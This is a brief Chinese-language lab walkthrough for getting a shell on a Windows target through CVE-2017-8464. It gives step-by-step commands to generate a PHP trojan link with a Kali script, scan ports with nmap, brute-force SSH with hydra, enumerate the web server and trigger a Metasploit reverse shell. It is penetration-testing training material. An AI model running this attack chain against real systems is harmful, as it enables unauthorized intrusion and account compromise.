Kali Linux之CVE-2017-8464漏洞实现getshell
声明:
本分享仅做学习交流,请自觉遵守法律法规!
一、战略部署
1.1 打开终端,进入kali的命令行,并切换路径至/桌面/cve- 2017-8464_script/

1.2 使用./secist_script.sh来运行脚本程序

1.3 在secist>处输入数字1进入服务器通过web方式投递脚本生成后门,按照提示输入渗透机ip地址,和监听端口后回车


1.4 脚本程序将自动在后台生成一个php木马的连接

二、开始攻击
2.1 新生成的链接稍后备用,使用命令Ctrl+Shift+t开启一个新的窗口,在新的窗口输入命令nmap –sV –T 4 –n –p 1-1000 靶机ip 对系统开放端口进行扫描

2.2 发现对方主机开放有22/tcp(ssh)和 80/tcp(http)端口,使用命令hydra -l administrator -P /usr/share/wordlists/fasttrack.txt 靶机IP ssh对目标端口进行暴力破解

2.3 使用命令ssh administrator@靶机IP 进行远程连接

2.4 登陆成功后,进入到命令行中,使用命令tasklist |findstr httpd查看目标服务器软件的信息

2.5 使用命令wmic process where name="httpd.exe" get processid,executablepath,name查看httpd进程运行的路径

2.6 切换到phpwamp\server下寻找php的路径,继续使用findstr来查询前面nmap扫描获取到的PHP关键的版本信息(5.6.14)

2.7 进入目录找到php.exe程序,然后使用1.4获得的木马连接使用php命令来打开远程目录的快捷方式木马

三、成功Getshell
3.1 回到msf命令终端,发现成功回弹了一个目标的shell,使用命令sessions –I 1进行切换

3.2 输入shell命令即可进入终端